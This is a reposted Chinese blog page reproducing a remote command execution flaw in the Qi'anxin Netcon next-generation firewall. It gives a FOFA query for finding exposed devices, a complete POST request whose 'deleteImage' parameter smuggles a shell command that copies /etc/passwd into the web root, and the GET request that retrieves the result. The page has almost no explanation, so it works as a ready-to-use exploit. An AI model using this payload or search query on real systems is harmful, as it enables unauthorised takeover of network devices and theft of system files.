码上快乐

相关内容   简体   繁体

奇安信 网康下一代防火墙 RCE

本文转载自  查看原文  2022-03-29 10:39  773    网络安全

漏洞概述

存在远程命令执行,漏洞攻击者可以获取服务器权限。

FOFA

app="网康科技-下一代防火墙"

漏洞复现

进入登录页面抓包

 

 

 

 构造数据包

变更发包方式:POST /directdata/direct/router HTTP/1.1
添加POST数据:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

 

 

 构造数据包

变更发包方式:GET /test.txt HTTP/1.1

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 【复现】奇安信 网康下一代防火墙 RCE 2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节 2021年最新HW漏洞奇安信防火墙网康下一代RCE漏洞细节参考 天融信下一代防火墙(NGFW) .NET 5 - 下一代.NET JupyterLab,极其强大的下一代notebook! Fetch:下一代 Ajax 技术 Pulsar 下一代消息平台 下一代Jquery模板-----JsRender Podman - 下一代Linux容器工具
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM